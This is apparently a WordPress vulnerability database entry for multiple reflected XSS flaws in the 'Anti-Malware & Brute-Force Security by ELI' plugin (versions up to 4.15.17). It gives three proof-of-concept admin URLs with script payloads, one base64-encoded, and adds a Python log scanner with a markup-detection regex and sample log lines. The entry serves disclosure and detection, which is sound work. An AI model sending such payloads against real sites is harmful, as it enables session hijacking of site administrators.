Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS



Proof of Concept
http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_msg=xsstest<script>alert(1)</script>

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&scan_what=1&scan_type=xsstest<script>alert(1)</script>

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_fixing=2&GOTMLS_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
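
A defensive check over web-server access logs for the three parameters used in the proof-of-concept URLs above, added here as an example and not taken from the advisory or the plugin. The markup heuristic, the function names and the sample log lines are assumptions constructed for illustration; the third parameter is base64-decoded before inspection because its PoC value is base64-encoded.

```python
import re
from base64 import b64decode
from urllib.parse import parse_qsl, urlsplit

# Parameters named in the advisory's proof-of-concept URLs.
REFLECTED = {"GOTMLS_msg", "scan_type"}
BASE64_ENCODED = {"GOTMLS_fix[]"}
# Heuristic for HTML/script markup in a value (an assumption; tune for your traffic).
MARKUP = re.compile(r"<\s*/?\s*[a-zA-Z]|\bon\w+\s*=|javascript:", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines in combined-log style, not real traffic
    '192.0.2.10 - - [15/May/2015:10:00:00 +0000] "GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_msg=xsstest%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.10 - - [15/May/2015:10:00:05 +0000] "GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_fixing=2&GOTMLS_fix%5B%5D=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== HTTP/1.1" 200 512',
    '192.0.2.11 - - [15/May/2015:10:01:00 +0000] "GET /wp-admin/admin.php?page=GOTMLS-settings&scan_what=1&scan_type=quick HTTP/1.1" 200 512',
]

def _decode(value):
    """Decode a base64 query value; return '' when it is not valid base64."""
    value = value.replace(" ", "+")  # parse_qsl turns a literal '+' into a space
    try:
        padded = value + "=" * (-len(value) % 4)
        return b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def suspicious_params(url):
    """Return sorted names of GOTMLS-settings parameters whose value carries markup."""
    query = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    if ("page", "GOTMLS-settings") not in query:
        return []
    hits = set()
    for name, value in query:
        if name in REFLECTED and MARKUP.search(value):
            hits.add(name)
        elif name in BASE64_ENCODED and MARKUP.search(_decode(value)):
            hits.add(name)
    return sorted(hits)

def scan_log(lines):
    """Return (line_number, parameter_names) for each flagged request line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings
```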

Affects Plugin

References

URL https://web.archive.org/web/20160314072650/https://software-talk.org/blog/2015/05/reflected-xss-vulnerability-gotmls/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Tim Coen
Views 4198
Verified No
WPVDB ID 7989

Timeline

Publicly Published 2015-05-15 (about 5 years ago)
Added 2015-05-15 (about 5 years ago)
Last Updated 2019-10-21 (9 months ago)
